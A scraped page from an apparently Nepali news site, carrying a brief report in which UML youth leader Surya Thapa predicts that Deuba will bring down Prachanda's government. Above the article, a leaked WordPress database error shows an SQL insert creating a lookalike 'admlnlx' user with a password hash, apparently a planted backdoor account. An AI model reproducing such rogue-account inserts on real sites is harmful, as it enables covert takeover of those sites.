WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrF9gR56fCDC9ne6Ed3F/13QopNwPx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:45:16', '', 'admlnlx', 'admlnlx')
चितवन, माघ २५–
नेकपा एमालेका युवा नेता सूर्य थापाले प्रचण्ड नेतृत्वको सरकार शेरबहादुर देउवाले ढाल्ने बताउनुभएको छ ।
प्रेस चौतरी चितवनले आज नारायणगढमा आयोजना गरेको प्रशिक्षण कार्यक्रममा बोल्दै थापाले भन्नुभयो–“जसरी केपी ओली प्रधानमन्त्री हुँदा प्रस्तावक भए प्रचण्डले आफै प्रस्ताव गरि सरकार ढाले, त्यसरी नै प्रचण्डका प्रस्तावक भएका देउवाले सरकार ढाल्छन् ।” सत्ताशिन दलहरुबीच खिचातानी सुरु भई सकेको भन्दै नेता थापाले देउवा प्रधानमन्त्री बन्नका लागि लविङ सुरु गरि सकेको बताउनुभयो ।
नेता थापाले प्रचण्ड नेतृत्वको सरकारले अहिलेसम्म निर्वाचनको मिति घोषणा गर्न नसक्नु लाचारी पन भएको बताउनुभयो ।